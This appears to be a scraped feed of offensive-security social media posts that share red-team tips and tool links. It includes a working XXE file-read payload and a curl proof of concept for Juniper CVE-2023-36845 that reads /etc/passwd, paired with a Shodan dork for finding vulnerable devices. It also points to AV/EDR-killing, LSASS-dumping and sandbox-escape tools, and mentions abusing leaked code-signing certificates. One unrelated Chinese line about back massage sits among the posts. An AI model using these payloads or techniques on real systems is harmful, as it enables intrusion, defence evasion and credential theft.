If your exploiting your XXE under Java, I recommend a payload like this: <!DOCTYPE root [ <!ENTITY stuff SYSTEM "."> ]><root>&stuff;</root> So that you can start the file leak from the CWD of the Java process. This is important when chaining for an RCE.

scan4all Official repository vuls Scan: 15000+PoCs; 23 kinds of application password crack; 7000+Web fingerprints; 146 protocols and 90000+ rules Port scanning; Fuzz, HW, awesome BugBounty github.com/hktalent/scan4all #pentesting #redteam #bugbounty

AD: Local Admin to Domain Admin It doesn't matter if you don't see active sessions, always look in the Kerberos cache. query session VS klist sessions Don't attempt an LSASS DUMP, move on! GIUDA 2023090500 Now FUD again github.com/foxlox/GIUDA #redteam #adprivesc #kerberos #lsass

Scan for WordPress, Joomla, Drupal and Moodle bugs via CMSmap. Clone it. Install The Exploit Database. Update the CMSmap Database. github.com/dionach/CMSmap github.com/Doctype02/exploit… Run it on file mode. python3 cmsmap.py -i test.txt -t 200 -F -s -o test-resulte.txt

Juniper J-Web - Remote Code Execution 🔥 - CVE-2023-36845 Nearly 14,000 Juniper devices are affected, as a search on Shodan shows: Dork : title:"Juniper" http.favicon.hash:2141724739 Poc: curl <TARGET> -F $'auto_prepend_file="/etc/passwd\n"' -F 'PHPRC=/dev/fd/0' Here is a vulnerability scanner that has been specially developed to spot this vulnerability or you can also use Nuclei: github.com/vulncheck-oss/cve… #Infosec #Juniper #ZeroDay #CVE #Hacking

如何按摩腰部

How To Hack Web Applications with @hakluke 👇 ⚙️ Setting up Burp Suite 🪲 Remote Command/Code Execution (RCE) 💉 SQL Injection 💉 XML External Entity Injection 🐛 Insecure Deserialization 🐞 XSS #HackerContentBlogs labs.detectify.com/2022/05/1…

This is still one of my favorite wordlist to use when bug bounty hunting 💯 github.com/Bo0oM/fuzz.txt #bugbountytips #bugbounty #bugbountytip #redteam #infosec

"NimBlackout: Kill AV/EDR leveraging BYOVD attack" #infosec #pentest #redteam github.com/Helixo32/NimBlack…

A Collection of Chrome Sandbox Escape POCs/Exploits for learning github.com/allpaca/chrome-sb…

𝘼𝙑/𝙀𝘿𝙍 𝙀𝙫𝙖𝙨𝙞𝙤𝙣 | 𝙈𝙖𝙡𝙬𝙖𝙧𝙚 𝘿𝙚𝙫𝙚𝙡𝙤𝙥𝙢𝙚𝙣𝙩 👾 Parte 1:- medium.com/@0xHossam/av-edr-… Parte 2:- medium.com/@0xHossam/av-edr-… Parte 3:- medium.com/@0xHossam/unhooki… Parte 4:- medium.com/@0xHossam/av-edr-…

This looks promising: github.com/lem0nSec/ShellGho…

Use asnmap and tlsx to map out the IP ranges of an ASN and then extract domain names from their TLS certificates! #HackwithAutomation #ASNmap #TLSx

Here is a small POC for doing steganography with Nim-Lang. Useful for reducing payload entropy on disk or giving you a remote Killswitch. github.com/OffenseTeacher/St…

Revamping my ☢️ Modern Initial Access training feels soo good! Next week's @x33fcon session will be a blast! - Nuked away VBA slides - 10 leaked code signing certs & abuse guidance - Signed & weaponised MSIX - Signed ClickOnce (hopefully!)🤞 - plenty of Complex Infection Chains

Proof of Concept for userland hook evasion - Ruy Lopez is released. The talk at @x33fcon was awesome :-) github.com/S3cur3Th1sSh1t/Ru…

USE SSP DUMP LSASS BYPASS AV gist.github.com/xpn/93f2b75b…

CVE-2020-0796 Windows SMBv3 LPE Exploit 👏👏👏 github.com/danigargu/CVE-202…

Common ways to get RCE: - SSRF to Metadata - Jenkins /script - Jenkins Orange RCE - Leaked cloud creds/keys (online, via LFD, ect) - Arbitrary file upload - ImageTragik - SSTI Fill in how you've gotten RCE!